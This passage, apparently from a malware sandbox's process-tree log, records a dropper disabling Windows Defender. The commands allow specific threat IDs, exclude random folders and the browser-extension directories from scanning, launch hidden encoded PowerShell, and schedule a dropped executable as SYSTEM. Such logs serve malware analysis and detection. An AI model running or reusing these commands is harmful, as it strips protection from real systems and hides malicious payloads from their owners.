\"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"2⤵PID:4620
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:323⤵PID:3796
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:324⤵PID:3784
-
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:643⤵PID:5612
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:323⤵PID:5892
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:643⤵PID:5268
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:323⤵PID:5692
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:643⤵PID:1036
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:323⤵PID:5540
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:643⤵PID:5080
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:323⤵PID:1548
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:643⤵PID:2932
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:323⤵PID:5368
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:643⤵PID:5996
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:323⤵PID:5068
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:643⤵PID:5744
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:323⤵PID:4676
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:643⤵PID:4568
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:323⤵PID:4504
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:643⤵PID:6028
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:323⤵PID:2396
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:643⤵PID:6032
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:323⤵PID:2436
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:643⤵PID:1540
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:323⤵PID:3696
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:643⤵PID:6064
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:323⤵PID:5916
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:643⤵PID:2380
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:323⤵PID:1112
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:643⤵PID:5232
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ADJLsahCU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ADJLsahCU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\AymmxTCbqblaRZJGVqR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\AymmxTCbqblaRZJGVqR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\DQANlvmTAvZU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\DQANlvmTAvZU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\PZjcxajBIsNTC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\PZjcxajBIsNTC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\mWJfrhglotUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\mWJfrhglotUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\VyWMmqtuSNndeGVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\VyWMmqtuSNndeGVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\pzWhdRqbDjaoGSUyA\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\pzWhdRqbDjaoGSUyA\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\WPGfhLqOzAIwKSwi\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\WPGfhLqOzAIwKSwi\" /t REG_DWORD /d 0 /reg:64;"2⤵PID:464
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ADJLsahCU" /t REG_DWORD /d 0 /reg:323⤵PID:3144
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ADJLsahCU" /t REG_DWORD /d 0 /reg:324⤵PID:5220
-
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ADJLsahCU" /t REG_DWORD /d 0 /reg:643⤵PID:3940
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\AymmxTCbqblaRZJGVqR" /t REG_DWORD /d 0 /reg:323⤵PID:3784
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\AymmxTCbqblaRZJGVqR" /t REG_DWORD /d 0 /reg:643⤵PID:820
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DQANlvmTAvZU2" /t REG_DWORD /d 0 /reg:323⤵PID:5144
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DQANlvmTAvZU2" /t REG_DWORD /d 0 /reg:643⤵PID:5340
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\PZjcxajBIsNTC" /t REG_DWORD /d 0 /reg:323⤵PID:1028
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\PZjcxajBIsNTC" /t REG_DWORD /d 0 /reg:643⤵PID:4628
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\mWJfrhglotUn" /t REG_DWORD /d 0 /reg:323⤵PID:5540
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\mWJfrhglotUn" /t REG_DWORD /d 0 /reg:643⤵PID:5080
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\VyWMmqtuSNndeGVB /t REG_DWORD /d 0 /reg:323⤵PID:6128
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\VyWMmqtuSNndeGVB /t REG_DWORD /d 0 /reg:643⤵PID:5136
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:323⤵PID:4340
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:643⤵PID:3124
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:323⤵PID:4684
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:643⤵PID:1248
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\pzWhdRqbDjaoGSUyA /t REG_DWORD /d 0 /reg:323⤵PID:5200
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\pzWhdRqbDjaoGSUyA /t REG_DWORD /d 0 /reg:643⤵PID:5796
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\WPGfhLqOzAIwKSwi /t REG_DWORD /d 0 /reg:323⤵PID:5172
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\WPGfhLqOzAIwKSwi /t REG_DWORD /d 0 /reg:643⤵PID:4568
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gflsSnYKZ" /SC once /ST 03:08:47 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="2⤵
- Creates scheduled task(s)
PID:5476
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gflsSnYKZ"2⤵PID:5944
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:6120
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gflsSnYKZ"2⤵PID:5584
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "XyyyteIMwZeutaZuw" /SC once /ST 03:26:27 /RU "SYSTEM" /TR "\"C:\Windows\Temp\WPGfhLqOzAIwKSwi\CKEIBaXuklpWnmi\PywzyBK.exe\" GH /vbYLdidcG 385118 /S" /V1 /F2⤵
- Creates scheduled task(s)
PID:2624
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "XyyyteIMwZeutaZuw"2⤵PID:5616
-
-
C:\Users\Admin\AppData\Local\Temp\7zS9824.tmp\Install.exeC:\Users\Admin\AppData\Local\Temp\7zS9824.tmp\Install.exe it /gzCdidTIuK 385118 /S1⤵PID:5520
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"2⤵PID:5616
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"3⤵PID:4144
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 64⤵PID:5136
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 65⤵PID:3512
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"3⤵PID:5292
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 64⤵PID:5404
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 65⤵PID:4688
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"3⤵PID:2444
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 64⤵PID:2292
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 65⤵PID:5436
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"3⤵PID:5504
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 64⤵PID:3184
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 65⤵PID:696
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"3⤵PID:1972
-
C:\Windows\SysWOW64\cmd.exe/C powershell start-process -WindowStyle Hidden gpupdate.exe /force4⤵PID:1500
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell start-process -WindowStyle Hidden gpupdate.exe /force5⤵
- Command and Scripting Interpreter: PowerShell
PID:6120 -
C:\Windows\SysWOW64\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force6⤵PID:2036
-
-
-
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"2⤵PID:4676
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:323⤵PID:3452
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:324⤵PID:6008
-
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:643⤵PID:3164
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:323⤵PID:4604
-
-
